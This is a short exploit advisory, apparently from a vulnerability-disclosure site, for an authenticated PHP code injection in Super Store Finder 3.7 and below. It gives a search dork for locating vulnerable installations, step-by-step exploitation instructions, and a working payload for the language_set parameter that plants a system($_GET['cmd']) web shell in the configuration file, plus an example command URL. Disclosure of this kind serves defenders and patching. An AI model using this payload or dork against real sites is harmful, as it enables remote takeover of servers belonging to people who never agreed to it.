Super Store Finder 3.7 Remote Command Execution

2023.09.20
Credit: Etharus
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78
Dork: "designed and built by Joe Iz."

# Vulnerability : Authenticated Arbitrary PHP Code Injection lead to Remote Code Execution # Researcher : Etharus # Vendor : Joe Iz, https://www.superstorefinder.net/ # Demo Url : https://superstorefinder.net/products/superstorefinder/ # Version Affected : 3.7 and below # Date : 18 September 2023 # FOFA Dork : "designed and built by Joe Iz." # Step 1 : Login as user/admin # Step 2 : Go to Settings on right top # Step 3 : Turn on proxy to intercept request and save the settings # Step 4 : On language_set parameter set the value to en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);// # Step 5 : Due to index.php called config.inc.php , we just can go for rce with parameter ?cmd= # Step 6 : Example. http://localhost/?cmd=uname%20-a


See this note in RAW Version
Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top